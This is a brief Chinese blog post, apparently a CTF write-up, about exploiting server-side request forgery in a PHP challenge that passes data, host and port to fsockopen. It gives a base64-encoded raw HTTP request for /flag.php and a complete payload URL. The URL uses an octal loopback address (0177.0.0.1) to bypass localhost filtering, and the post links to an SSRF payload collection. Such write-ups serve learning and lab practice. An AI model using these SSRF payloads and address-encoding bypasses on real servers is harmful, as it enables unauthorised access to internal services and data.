SSRF服务端请求伪造

87 阅读1分钟

本文已参与 「新人创作礼」 活动,一起开启掘金创作之路。

如题: 在这里插入图片描述 通过get传入三个参数,data,host,port. fsockopen创建一个文件句柄,将data内容写进去(此处执行请求访问操作),fgets读取文件,返回结果打印出来。 ref:blog.csdn.net/u011772907/…

data模拟http请求,写入以下内容,编码为base64

GET /flag.php HTTP/1.1
HOST:127.0.0.1 
Connection:Close
Referer:127.0.0.1
//请求头结束,结尾有两个 \r\n

在这里插入图片描述

R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSE9TVDoxMjcuMC4wLjEgDQpDb25uZWN0aW9uOkNsb3NlDQpSZWZlcmVyOjEyNy4wLjAuMQ0KDQo=

其余两个参数标准传入就可。 payload:

/index.php?data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSE9TVDoxMjcuMC4wLjEgDQpDb25uZWN0aW9uOkNsb3NlDQpSZWZlcmVyOjEyNy4wLjAuMQ0KDQo=&host=0177.0.0.1&port=80

漏洞详情&Bypass:

SSRF原理: www.cnblogs.com/P2018214600… pyload合集:github.com/mishmashclo…